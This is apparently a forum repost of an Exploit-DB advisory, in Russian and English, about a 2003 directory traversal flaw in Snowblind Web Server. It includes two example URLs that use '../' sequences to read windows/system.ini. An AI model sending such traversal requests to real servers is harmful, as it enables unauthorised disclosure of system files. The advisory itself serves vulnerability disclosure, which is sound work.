Exploit Snowblind 1.0/1.1 - Web Server File Disclosure

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
22609
Проверка EDB
  1. Пройдено
Автор
EURONYMOUS
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2003-0312
Дата публикации
2003-05-16
Код:
source: https://www.securityfocus.com/bid/7618/info

It has been announced that Snowblind Web Server is vulnerable to a condition that may result in the disclosure of potentially sensitive information.

According to the report, Snowblind Web Server does not perform correct access validation on client requested paths which include "../" character sequences.

http://www.example.com/../../windows/system.ini
http://www.example.com/internal.sws?../../windows/system.ini
 
Источник
www.exploit-db.com

Похожие темы